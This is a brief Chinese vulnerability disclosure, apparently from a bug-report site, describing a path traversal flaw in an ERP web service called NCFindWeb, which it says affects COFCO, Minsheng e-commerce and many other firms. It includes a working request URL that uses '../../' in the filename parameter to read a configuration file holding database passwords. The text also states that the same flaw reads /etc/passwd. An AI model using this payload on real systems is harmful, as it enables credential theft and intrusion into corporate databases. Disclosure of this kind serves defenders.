该漏洞权限比较大,可以获取数据库,/etc/passwd等信息,漏洞存在链接:
http://vul/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml
可以读取到数据库密码,如图:

也可以读取/etc/passwd,如图:

中粮集团,民生电商等大量企业受到影响
暂无评论